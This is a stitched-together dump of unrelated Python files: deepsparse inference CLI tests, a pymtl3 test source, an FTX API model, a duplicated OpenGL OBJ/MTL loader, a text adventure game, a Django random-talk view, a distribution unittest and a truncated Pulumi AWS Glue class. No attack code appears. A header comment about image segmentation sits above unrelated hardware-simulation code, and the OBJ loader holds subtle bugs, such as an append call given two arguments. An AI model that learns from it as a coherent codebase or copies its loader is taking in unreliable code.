# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import os from typing import Dict, List import ndjson import pytest from helpers import predownload_stub, run_command @pytest.mark.smoke def test_run_inference_help(): cmd = ["deepsparse.transformers.run_inference", "--help"] print(f"\n==== test_run_inference_help command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_help output ====\n{res.stdout}") assert res.returncode == 0 assert "usage: deepsparse.transformers.run_inference" in res.stdout assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() @pytest.mark.smoke def test_run_inference_ner(cleanup: Dict[str, List]): cmd = [ "deepsparse.transformers.run_inference", "--task", "ner", "--model-path", "zoo:nlp/token_classification/bert-base/pytorch/huggingface/conll2003/" "12layer_pruned80_quant-none-vnni", "--data", "tests/test_data/bert-ner-test-input.json", "--output-file", "output.json", "--scheduler", "multi", ] cleanup["files"].append("output.json") print(f"\n==== test_run_inference_ner command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_ner output ====\n{res.stdout}") assert res.returncode == 0 assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() # light validation of output file expected = "red" assert os.path.exists("output.json") with open("output.json") as f: data = json.load(f) assert len(data) == 1 assert data["predictions"][0][0]["word"] == expected @pytest.mark.parametrize( ("input_format", "model_path", "local_model"), [ pytest.param( "csv", "zoo:nlp/question_answering/bert-base/pytorch/huggingface/squad/" "pruned_6layers-aggressive_98", True, marks=pytest.mark.smoke, ), ( "json", "zoo:nlp/question_answering/bert-base/pytorch/huggingface/squad/" "pruned_6layers-aggressive_98", False, ), ], ) def test_run_inference_qa( input_format: str, model_path: str, local_model: bool, cleanup: Dict[str, List] ): if local_model: model = predownload_stub(model_path, copy_framework_files=True) model_path = model.dir_path cmd = [ "deepsparse.transformers.run_inference", "--task", "question_answering", "--model-path", model_path, "--data", f"tests/test_data/bert-qa-test-input.{input_format}", "--output-file", "output.json", "--scheduler", "single", ] cleanup["files"].append("output.json") print(f"\n==== test_run_inference_qa command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_qa output ====\n{res.stdout}") # validate command executed successfully assert res.returncode == 0 assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() # validate output expected_answers = ["Snorlax", "Pikachu", "Bulbasaur"] assert os.path.exists("output.json") with open("output.json") as f: items = ndjson.load(f) for actual, expected_answer in zip(items, expected_answers): assert actual["answer"] == expected_answer @pytest.mark.parametrize( ("input_format", "model_path", "local_model", "additional_opts"), [ ( "csv", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", 
False, ["--batch-size", "1", "--engine-type", "onnxruntime"], ), ( "txt", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, ["--num-cores", "4", "--engine-type", "onnxruntime"], ), pytest.param( "csv", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, [], marks=pytest.mark.smoke, ), ( "json", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, ["--batch-size", "5", "--engine-type", "deepsparse"], ), ( "txt", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, ["--batch-size", "10", "--num-cores", "4"], ), ], ) def test_run_inference_sst( input_format: str, model_path: str, local_model: bool, additional_opts: List[str], cleanup: Dict[str, List], ): if local_model: model = predownload_stub(model_path, copy_framework_files=True) model_path = model.dir_path cmd = [ "deepsparse.transformers.run_inference", "--task", "text_classification", "--model-path", model_path, "--data", f"tests/test_data/bert-sst-test-input.{input_format}", "--output-file", "output.json", *additional_opts, ] cleanup["files"].append("output.json") print(f"\n==== test_run_inference_sst command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_sst output ====\n{res.stdout}") assert res.returncode == 0 assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() # light validation of output file # TODO: condition output validation on batch-size due to padding strategy (final # input is repeated to fill in remaining batches) # expected = ["LABEL_1", "LABEL_0"] assert os.path.exists("output.json") # with open("output.json") as f: # for idx, item in enumerate(json_lines.reader(f)): # assert item[0]["label"] == expected[idx] # assert len(data) == 1 # assert data[0]["label"] == expected # coding=utf-8 # author: Lan_zhijiang # description: 图片物品识别(语义分割) """ ======================================================================== Test sources ======================================================================== Test sources with CL or RTL interfaces. Author : Date : Mar 11, 2019 """ from collections import deque from pymtl3 import * from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL #------------------------------------------------------------------------- # TestSrcCL #------------------------------------------------------------------------- class TestSrcCL( Component ): def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ): s.send = CallerIfcCL( Type=Type ) s.msgs = deque( msgs ) s.count = initial_delay s.delay = interval_delay @update_once def up_src_send(): if s.count > 0: s.count -= 1 elif not s.reset: if s.send.rdy() and s.msgs: s.send( s.msgs.popleft() ) s.count = s.delay # reset count after a message is sent def done( s ): return not s.msgs # Line trace def line_trace( s ): return "{}".format( s.send ) #------------------------------------------------------------------------- # TestSrcRTL #------------------------------------------------------------------------- # TODO: deprecating TestSrcRTL. 
class TestSrcRTL( Component ): def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ): # Interface s.send = SendIfcRTL( Type ) # Components s.src = TestSrcCL( Type, msgs, initial_delay, interval_delay ) s.adapter = RecvCL2SendRTL( Type ) connect( s.src.send, s.adapter.recv ) connect( s.adapter.send, s.send ) def done( s ): return s.src.done() # Line trace def line_trace( s ): return "{}".format( s.send ) from pydantic import BaseModel, Field from aioftx.http import Request, Response class FutureStats(BaseModel): volume: float next_funding_rate: float next_funding_time: str expiration_price: float predicted_expiration_price: float strike_price: float open_interest: float class GetFutureStatsRequest(Request): path = "/futures/{future_name}/stats" future_name: str = Field(..., path=True) class GetFutureStatsResponse(Response[FutureStats]): pass 0 import OpenGL.GL as GL import OpenGL.GLUT as GLUT import OpenGL.GLU as GLU ## Avoid conflict with Python open from PIL.Image import open as imageOpen ## This class is used to create an object from geometry and materials ## saved to a file in WaveFront object format. The object exported ## from Blender must have the normals included. class ImportedObject: ## Constructor that includes storage for geometry and materials ## for an object. def __init__(self, fileName, setAmbient = 0.9, verbose = False): self.faces = [] self.verts = [] self.norms = [] self.texCoords = [] self.materials = [] self.fileName = fileName self.setAmbient = False self.hasTex = False ## Set this value to False before loading if the model is flat self.isSmooth = True self.verbose = verbose ## Load the material properties from the file def loadMat(self): ## Open the material file with open((self.fileName + ".mtl"), "r") as matFile: ## Load the material properties into tempMat tempMat = [] for line in matFile: ## Break the line into its components vals = line.split() ## Make sure there's something in the line (not blank) if len(vals) > 0 : ## Record that a new material is being applied if vals[0] == "newmtl": n = vals[1] tempMat.append(n) ## Load the specular exponent elif vals[0] == "Ns": n = vals[1] tempMat.append(float(n)) ## Load the diffuse values elif vals[0] == "Kd": n = map(float, vals[1:4]) tempMat.append(n) ## if self.setAmbient is False, ignore ambient values ## and load diffuse values twice to set the ambient ## equal to diffuse if self.setAmbient: tempMat.append(n) ## load the ambient values (if not overridden) elif vals[0] == "Ka" and not self.setAmbient: n = map(float, vals[1:4]) tempMat.append(n) ## load the specular values elif vals[0] == "Ks": n = map(float, vals[1:4]) tempMat.append(n) tempMat.append(None) ## specular is the last line loaded for the material self.materials.append(tempMat) tempMat = [] ## load texture file info elif vals[0] == "map_Kd": ## record the texture file name fileName = vals[1] self.materials[-1][5]=(self.loadTexture(fileName)) self.hasTex = True if self.verbose: print("Loaded " + self.fileName + \ ".mtl with " + str(len(self.materials)) + " materials") ## Load the object geometry. 
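    ## The parser below expects standard WaveFront records: "v x y z" vertices,
    ## "vn" normals, "vt" texture coordinates, "usemtl" material switches (stored in
    ## self.faces as a [-1, name, count] marker), and "f v/vt/vn ..." faces whose
    ## 1-based indices are converted to 0-based (missing entries become -1).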
def loadOBJ(self): ## parse the materials file first so we know when to apply materials ## and textures self.loadMat() numFaces = 0 with open((self.fileName + ".obj"), "r") as objFile: for line in objFile: ## Break the line into its components vals = line.split() if len(vals) > 0: ## Load vertices if vals[0] == "v": v = map(float, vals[1:4]) self.verts.append(v) ## Load normals elif vals[0] == "vn": n = map(float, vals[1:4]) self.norms.append(n) ## Load texture coordinates elif vals[0] == "vt": t = map(float, vals[1:3]) self.texCoords.append(t) ## Load materials. Set index to -1! elif vals[0] == "usemtl": m = vals[1] self.faces.append([-1, m, numFaces]) ## Load the faces elif vals[0] == "f": tempFace = [] for f in vals[1:]: ## face entries have vertex/tex coord/normal w = f.split("/") ## Vertex required, but should work if texture or ## normal is missing if w[1] != '' and w[2] != '': tempFace.append([int(w[0])-1, int(w[1])-1, int(w[2])-1]) elif w[1] != '': tempFace.append([int(w[0])-1, int(w[1])-1], -1) elif w[2] != '': tempFace.append([int(w[0])-1, -1, int(w[2])-1]) else : tempFace.append([int(w[0])-1,-1, -1]) self.faces.append(tempFace) if self.verbose: print("Loaded " + self.fileName + ".obj with " + \ str(len(self.verts)) + " vertices, " + \ str(len(self.norms)) + " normals, and " + \ str(len(self.faces)) + " faces") ## Draws the object def drawObject(self): if self.hasTex: GL.glEnable(GL.GL_TEXTURE_2D) ## Use GL.GL_MODULATE instead of GL.GL_DECAL to retain lighting GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_MODULATE) ## ***************************************************************** ## Change GL.GL_FRONT to GL.GL_FRONT_AND_BACK if faces are missing ## (or fix the normals in the model so they point in the correct ## direction) ## ***************************************************************** GL.glPolygonMode(GL.GL_FRONT, GL.GL_FILL) for face in self.faces: ## Check if a material if face[0] == -1: self.setModelColor(face[1]) else: GL.glBegin(GL.GL_POLYGON) ## drawing normal, then texture, then vertice coords. for f in face: if f[2] != -1: GL.glNormal3f(self.norms[f[2]][0], self.norms[f[2]][1], self.norms[f[2]][2]) if f[1] != -1: GL.glTexCoord2f(self.texCoords[f[1]][0], self.texCoords[f[1]][1]) GL.glVertex3f(self.verts[f[0]][0], self.verts[f[0]][1], self.verts[f[0]][2]) GL.glEnd() ## Turn off texturing (global state variable again) GL.glDisable(GL.GL_TEXTURE_2D) ## Finds the matching material properties and sets them. def setModelColor(self, material): mat = [] for tempMat in self.materials: if tempMat[0] == material: mat = tempMat ## found it, break out. break ## Set the color for the case when lighting is turned off. Using ## the diffuse color, since the diffuse component best describes ## the object color. GL.glColor3f(mat[3][0], mat[3][1],mat[3][2]) ## Set the model to smooth or flat depending on the attribute setting if self.isSmooth: GL.glShadeModel(GL.GL_SMOOTH) else: GL.glShadeModel(GL.GL_FLAT) ## The RGBA values for the specular light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_specular = [mat[4][0], mat[4][1], mat[4][2], 1.0] ## The RGBA values for the diffuse light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_diffuse = [mat[3][0], mat[3][1],mat[3][2], 1.0] ## The value for the specular exponent. The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_ambient = [mat[2][0], mat[2][1], mat[2][2],1.0] ## The value for the specular exponent. 
The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_shininess = 0.128*mat[1] ## Set the material specular values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SPECULAR, mat_specular) ## Set the material shininess values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SHININESS, mat_shininess) ## Set the material diffuse values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_DIFFUSE, mat_diffuse) ## Set the material ambient values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_AMBIENT, mat_ambient) ## See if there is a texture and bind it if it's there if mat[5] != None: GL.glBindTexture(GL.GL_TEXTURE_2D, mat[5]) ## Load a texture from the provided image file name def loadTexture(self, texFile): if self.verbose: print("Loading " + texFile) ## Open the image file texImage = imageOpen(texFile) try: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBA", 0, -1) except SystemError: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBX", 0, -1) ## GL.glGenTextures() and GL.glBindTexture() name and create a texture ## object for a texture image tempID = GL.glGenTextures(1) GL.glBindTexture(GL.GL_TEXTURE_2D, tempID) ## The four calls to GL.glTexParameter*() specify how the texture is to ## be wrapped and how the colors are to be filtered if there isn't an ## exact match between pixels in the texture and pixels on the screen ## Values for GL.GL_TEXTURE_WRAP_S and GL.GL_TEXTURE_WRAP_T are ## GL.GL_REPEAT and GL.GL_CLAMP GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT) ## The MAG_FILTER has values of GL.GL_NEAREST and GL.GL_LINEAR. There ## are many choices for values for the MIN_FILTER. GL.GL_NEAREST has ## more pixelation, but is the fastest GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST) ## Store the pixel data GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1) GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, 3, ix, iy, 0, GL.GL_RGBA, GL.GL_UNSIGNED_BYTE, image) return tempID import OpenGL.GL as GL import OpenGL.GLUT as GLUT import OpenGL.GLU as GLU ## Avoid conflict with Python open from PIL.Image import open as imageOpen ## This class is used to create an object from geometry and materials ## saved to a file in WaveFront object format. The object exported ## from Blender must have the normals included. class ImportedObject: ## Constructor that includes storage for geometry and materials ## for an object. 
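    ## Note: this second ImportedObject definition differs from the one above in that
    ## loadMat() and loadOBJ() take an optional texturePath prefix, so texture images
    ## referenced by map_Kd can be loaded from a separate directory.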
def __init__(self, fileName, setAmbient = 0.9, verbose = False): self.faces = [] self.verts = [] self.norms = [] self.texCoords = [] self.materials = [] self.fileName = fileName self.setAmbient = False self.hasTex = False ## Set this value to False before loading if the model is flat self.isSmooth = True self.verbose = verbose ## Load the material properties from the file def loadMat(self, texturePath = ""): ## Open the material file with open((self.fileName + ".mtl"), "r") as matFile: ## Load the material properties into tempMat tempMat = [] for line in matFile: ## Break the line into its components vals = line.split() ## Make sure there's something in the line (not blank) if len(vals) > 0 : ## Record that a new material is being applied if vals[0] == "newmtl": n = vals[1] tempMat.append(n) ## Load the specular exponent elif vals[0] == "Ns": n = vals[1] tempMat.append(float(n)) ## Load the diffuse values elif vals[0] == "Kd": n = map(float, vals[1:4]) tempMat.append(n) ## if self.setAmbient is False, ignore ambient values ## and load diffuse values twice to set the ambient ## equal to diffuse if self.setAmbient: tempMat.append(n) ## load the ambient values (if not overridden) elif vals[0] == "Ka" and not self.setAmbient: n = map(float, vals[1:4]) tempMat.append(n) ## load the specular values elif vals[0] == "Ks": n = map(float, vals[1:4]) tempMat.append(n) tempMat.append(None) ## specular is the last line loaded for the material self.materials.append(tempMat) tempMat = [] ## load texture file info elif vals[0] == "map_Kd": ## record the texture file name fileName = vals[1] self.materials[-1][5]=(self.loadTexture(texturePath +fileName)) self.hasTex = True if self.verbose: print("Loaded " + self.fileName + \ ".mtl with " + str(len(self.materials)) + " materials") ## Load the object geometry. def loadOBJ(self, texturePath = ""): ## parse the materials file first so we know when to apply materials ## and textures self.loadMat(texturePath) numFaces = 0 with open((self.fileName + ".obj"), "r") as objFile: for line in objFile: ## Break the line into its components vals = line.split() if len(vals) > 0: ## Load vertices if vals[0] == "v": v = map(float, vals[1:4]) self.verts.append(v) ## Load normals elif vals[0] == "vn": n = map(float, vals[1:4]) self.norms.append(n) ## Load texture coordinates elif vals[0] == "vt": t = map(float, vals[1:3]) self.texCoords.append(t) ## Load materials. Set index to -1! 
elif vals[0] == "usemtl": m = vals[1] self.faces.append([-1, m, numFaces]) ## Load the faces elif vals[0] == "f": tempFace = [] for f in vals[1:]: ## face entries have vertex/tex coord/normal w = f.split("/") ## Vertex required, but should work if texture or ## normal is missing if w[1] != '' and w[2] != '': tempFace.append([int(w[0])-1, int(w[1])-1, int(w[2])-1]) elif w[1] != '': tempFace.append([int(w[0])-1, int(w[1])-1], -1) elif w[2] != '': tempFace.append([int(w[0])-1, -1, int(w[2])-1]) else : tempFace.append([int(w[0])-1,-1, -1]) self.faces.append(tempFace) if self.verbose: print("Loaded " + self.fileName + ".obj with " + \ str(len(self.verts)) + " vertices, " + \ str(len(self.norms)) + " normals, and " + \ str(len(self.faces)) + " faces") ## Draws the object def drawObject(self): if self.hasTex: GL.glEnable(GL.GL_TEXTURE_2D) ## Use GL.GL_MODULATE instead of GL.GL_DECAL to retain lighting GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_MODULATE) ## ***************************************************************** ## Change GL.GL_FRONT to GL.GL_FRONT_AND_BACK if faces are missing ## (or fix the normals in the model so they point in the correct ## direction) ## ***************************************************************** GL.glPolygonMode(GL.GL_FRONT, GL.GL_FILL) for face in self.faces: ## Check if a material if face[0] == -1: self.setModelColor(face[1]) else: GL.glBegin(GL.GL_POLYGON) ## drawing normal, then texture, then vertice coords. for f in face: if f[2] != -1: GL.glNormal3f(self.norms[f[2]][0], self.norms[f[2]][1], self.norms[f[2]][2]) if f[1] != -1: GL.glTexCoord2f(self.texCoords[f[1]][0], self.texCoords[f[1]][1]) GL.glVertex3f(self.verts[f[0]][0], self.verts[f[0]][1], self.verts[f[0]][2]) GL.glEnd() ## Turn off texturing (global state variable again) GL.glDisable(GL.GL_TEXTURE_2D) ## Finds the matching material properties and sets them. def setModelColor(self, material): mat = [] for tempMat in self.materials: if tempMat[0] == material: mat = tempMat ## found it, break out. break ## Set the color for the case when lighting is turned off. Using ## the diffuse color, since the diffuse component best describes ## the object color. GL.glColor3f(mat[3][0], mat[3][1],mat[3][2]) ## Set the model to smooth or flat depending on the attribute setting if self.isSmooth: GL.glShadeModel(GL.GL_SMOOTH) else: GL.glShadeModel(GL.GL_FLAT) ## The RGBA values for the specular light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_specular = [mat[4][0], mat[4][1], mat[4][2], 1.0] ## The RGBA values for the diffuse light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_diffuse = [mat[3][0], mat[3][1],mat[3][2], 1.0] ## The value for the specular exponent. The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_ambient = [mat[2][0], mat[2][1], mat[2][2],1.0] ## The value for the specular exponent. The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_shininess = 0.128*mat[1] ## Set the material specular values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SPECULAR, mat_specular) ## Set the material shininess values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SHININESS, mat_shininess) ## Set the material diffuse values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_DIFFUSE, mat_diffuse) ## Set the material ambient values for the polygon front faces. 
GL.glMaterialfv(GL.GL_FRONT, GL.GL_AMBIENT, mat_ambient) ## See if there is a texture and bind it if it's there if mat[5] != None: GL.glBindTexture(GL.GL_TEXTURE_2D, mat[5]) ## Load a texture from the provided image file name def loadTexture(self, texFile): if self.verbose: print("Loading " + texFile) ## Open the image file texImage = imageOpen(texFile) try: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBX", 0, -1) except SystemError: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBA", 0, -1) ## GL.glGenTextures() and GL.glBindTexture() name and create a texture ## object for a texture image tempID = GL.glGenTextures(1) GL.glBindTexture(GL.GL_TEXTURE_2D, tempID) ## The four calls to GL.glTexParameter*() specify how the texture is to ## be wrapped and how the colors are to be filtered if there isn't an ## exact match between pixels in the texture and pixels on the screen ## Values for GL.GL_TEXTURE_WRAP_S and GL.GL_TEXTURE_WRAP_T are ## GL.GL_REPEAT and GL.GL_CLAMP GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT) ## The MAG_FILTER has values of GL.GL_NEAREST and GL.GL_LINEAR. There ## are many choices for values for the MIN_FILTER. GL.GL_NEAREST has ## more pixelation, but is the fastest GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST) ## Store the pixel data GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1) GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, 3, ix, iy, 0, GL.GL_RGBA, GL.GL_UNSIGNED_BYTE, image) return tempID pushbuttondesign/tutorialsescape.py0 """ program title: Escape the House program description: text based game in python author: steve """ def gameloop(r): print(map[r]["room_name"]); print(map[r]["room_description"]); print(map[r]["exits"]); dir = input("Which way do you want to move?\n"); flag = 0; while(flag != 1): if dir == "n" or \ dir == "s" or \ dir == "e" or \ dir == "w": print("\nYou move {}\n".format(compass[dir])); break; else: print("\nInvalid entry, try again"); dir = input("Which way do you want to move?\n"); return map[r][dir]; compass = {"n": "north", "s": "south", "e": "east", "w": "west"}; map = []; map.extend([ #room_name, room_description, room_exits_desc, to_north, to_east, to_south, to_west {"room_name": "Porch", "room_description": "The brick walls and black and white tileing tell you your are in the porch.\nThere is no one around.\nYou look though the open door into the hall.", "exits": "\nYou can move North", "n": 1, "s": 11, "e": 10, "w": 10}, {"room_name": "Hall", "room_description": "The house is still silent, you see some dirt on the carpet from an earler escapade.", "exits": "\nYou can move North, East, South or West", "n": 6, "s": 0, "e": 2, "w": 3}, {"room_name": "Toilet", "room_description": "The toilet and sink gleam the unintresting hostility of cold, white porcelin.", "exits": "\nYou can move West", "n": 10, "s": 10, "e": 10, "w": 1}, {"room_name": "Lounge", "room_description": "You enter the lounge timmidly, your not usually allowed in here becuase of the orniments.\nYou better slink out quickly.", "exits": "\nYou can move North or East", "n": 5, "s": 10, "e": 1, "w": 10}, {"room_name": "Dining Room", "room_description": "A veritable forist of chair and table legs in here.", "exits": "\nYou can move East", "n": 10, "s": 10, "e": 5, "w": 10}, {"room_name": "Play Room", 
"room_description": "You step over the toys strewn on the floor. A squeeky one tempts you but you resist.\nYou must continue your quest to get out.", "exits": "\nYou can move East, South, or West", "n": 10, "s": 3, "e": 6, "w": 4}, {"room_name": "Kitchen", "room_description": "Your faviorit room! The food is hidden away but you can smell something nice brewing.", "exits": "\nYou can move North, South, East, or West", "n": 8, "s": 1, "e": 7, "w": 5}, {"room_name": "Stairs", "room_description": "You know the garden cant be upstairs but you go up anyway.", "exits": "\nYou can move West", "n": 10, "s": 10, "e": 10, "w": 6}, {"room_name": "Back Porch", "room_description": "The back pourch, and what luck, the garage door is open too", "exits": "\nYou can move East or South", "n": 10, "s": 6, "e": 9, "w": 10}, {"room_name": "Garage", "room_description": "This rooms packed, bikes, cars, boxes, its a bit dark though.\nThere is a shaft of light comming from the back door though!\nCould this be it?", "exits": "\nYou can move North or West", "n": 11, "s": 10, "e": 10, "w": 8}, {"room_name": "There is no room there!", "room_description": "You cannot move that way\n", "exits": "", "n": 10, "s": 10, "e": 10, "w": 10}, {"room_name": "Garden", "room_description": "SCUCESS! You mannage to escape the building\nYou let out a exultent WOOF and get ready for a happy romp!", "exits": "\nCongratulations, You have finished the game", "n": 10, "s": 10, "e": 10, "w": 10}, ]); print("\n****************"); print("Escape the House"); print("****************"); print("The object of the game is to find your way out of the hosue in as few moves as possible\n" \ "To move enter n, s, e, or w\n"); print("You open your eyes and stand up.\nDespite your happy dream of the outside world you realise you are still inside.\n"); r = 0; #set the starting room count = 0; while(r != 11): #break if final room reached r_temp = gameloop(r); #reset if you go wrong if r_temp == 10: print(map[r_temp]["room_name"]); print(map[r_temp]["room_description"]); else: r = r_temp; #count your turns count += 1; print(map[r]["room_name"]); print(map[r]["room_description"]); print(map[r]["exits"]); print(); print("Your score is {}".format(count)); print("Smaller is better"); print(); from datetime import date from dateutil.relativedelta import relativedelta from rest_framework import viewsets from rest_framework import views from rest_framework.response import Response from .models import Talk from .serializers import TalkSerializer from django_filters.rest_framework import DjangoFilterBackend class TalkViewSet(viewsets.ModelViewSet): queryset = Talk.objects.all() serializer_class = TalkSerializer filter_backends = (DjangoFilterBackend,) filter_fields = ('code',) class RandomTalkView(views.APIView): def get(self, request, format=None): """ Get a random Talk object created no earlier than six months ago """ today = date.today() six_months_ago = today - relativedelta(months=6) talk = Talk.objects.filter(created__gte=six_months_ago).order_by('?').first() serializer = TalkSerializer(talk, many=False) return Response(serializer.data) import unittest from scenario import Scenario from save_analysis import SaveAnalysis import webbrowser from bounding import Bounded, Extremity from distribution import BinomialDistribution, UniformDistribution, Distribution from scenario_display import ScenarioDisplayConsole class SaveAnalysisText(unittest.TestCase): def test_view_distribution_graph(self): this_file = SaveAnalysis scenario = Scenario scenario.clear_list() 
self.__add_items(scenario) this_file.save_data(scenario) self.__show_boundings_for_scenario(scenario) self.__load_chart_page() @staticmethod def __show_bounding_for_uniform_extremity_scenario(scenario): scenario.case_name = "Uniform Extremity" scenario.distribution_profile = UniformDistribution scenario.distribution_bounding = Extremity ScenarioDisplayConsole.display(scenario) @staticmethod def __show_bounding_for_uniform_bounded_scenario(scenario): scenario.case_name = "Uniform Bounded" scenario.distribution_profile = UniformDistribution scenario.distribution_bounding = Bounded ScenarioDisplayConsole.display(scenario) @staticmethod def __show_bounding_for_binomial_extremity_scenario(scenario): scenario.case_name = "Binomial Extremity" scenario.distribution_profile = BinomialDistribution scenario.distribution_bounding = Extremity ScenarioDisplayConsole.display(scenario) @staticmethod def __show_bounding_for_binomial_bounded_scenario(scenario): scenario.case_name = "Binomial Bounded" scenario.distribution_profile = BinomialDistribution scenario.distribution_bounding = Bounded ScenarioDisplayConsole.display(scenario) @staticmethod def __load_chart_page(): new_tab = 0 chrome_path = 'open -a /Applications/Google\ Chrome.app %s' webbrowser.get(chrome_path).open("http://localhost:63342/HLIAPOS/BinomialAndUniformDistribution.html", new=new_tab) def __show_boundings_for_scenario(self, scenario): print("\nUniform Distribution Percentages") print(Distribution.percentage_distribution(UniformDistribution, len(scenario.dataList))) self.__show_bounding_for_uniform_bounded_scenario(scenario) self.__show_bounding_for_uniform_extremity_scenario(scenario) print("\nBinomial Distribution Percentages") print(Distribution.percentage_distribution(BinomialDistribution, len(scenario.dataList))) self.__show_bounding_for_binomial_bounded_scenario(scenario) self.__show_bounding_for_binomial_extremity_scenario(scenario) @staticmethod def __add_items(scenario): scenario.confidence_interval = 0.90 scenario.add_item(508) scenario.add_item(170) scenario.add_item(8) scenario.add_item(186) scenario.add_item(1320) scenario.add_item(365) scenario.add_item(187) scenario.add_item(2280) scenario.add_item(74) scenario.add_item(350) scenario.add_item(130) scenario.add_item(1155) scenario.add_item(480) scenario.add_item(30) scenario.add_item(420) scenario.add_item(592) scenario.add_item(380) scenario.add_item(460) scenario.add_item(83) scenario.add_item(110) # 21st measurement scenario.add_item(327) if __name__ == '__main__': unittest.main() AaronFriel/pulumi-aws-native # coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . 
import outputs from ._inputs import * __all__ = ['MLTransformArgs', 'MLTransform'] @pulumi.input_type class MLTransformArgs: def __init__(__self__, *, input_record_tables: pulumi.Input['MLTransformInputRecordTablesArgs'], role: pulumi.Input[str], transform_parameters: pulumi.Input['MLTransformTransformParametersArgs'], description: Optional[pulumi.Input[str]] = None, glue_version: Optional[pulumi.Input[str]] = None, max_capacity: Optional[pulumi.Input[float]] = None, max_retries: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, number_of_workers: Optional[pulumi.Input[int]] = None, tags: Optional[Any] = None, timeout: Optional[pulumi.Input[int]] = None, transform_encryption: Optional[pulumi.Input['MLTransformTransformEncryptionArgs']] = None, worker_type: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a MLTransform resource. """ pulumi.set(__self__, "input_record_tables", input_record_tables) pulumi.set(__self__, "role", role) pulumi.set(__self__, "transform_parameters", transform_parameters) if description is not None: pulumi.set(__self__, "description", description) if glue_version is not None: pulumi.set(__self__, "glue_version", glue_version) if max_capacity is not None: pulumi.set(__self__, "max_capacity", max_capacity) if max_retries is not None: pulumi.set(__self__, "max_retries", max_retries) if name is not None: pulumi.set(__self__, "name", name) if number_of_workers is not None: pulumi.set(__self__, "number_of_workers", number_of_workers) if tags is not None: pulumi.set(__self__, "tags", tags) if timeout is not None: pulumi.set(__self__, "timeout", timeout) if transform_encryption is not None: pulumi.set(__self__, "transform_encryption", transform_encryption) if worker_type is not None: pulumi.set(__self__, "worker_type", worker_type) @property @pulumi.getter(name="inputRecordTables") def input_record_tables(self) -> pulumi.Input['MLTransformInputRecordTablesArgs']: return pulumi.get(self, "input_record_tables") @input_record_tables.setter def input_record_tables(self, value: pulumi.Input['MLTransformInputRecordTablesArgs']): pulumi.set(self, "input_record_tables", value) @property @pulumi.getter def role(self) -> pulumi.Input[str]: 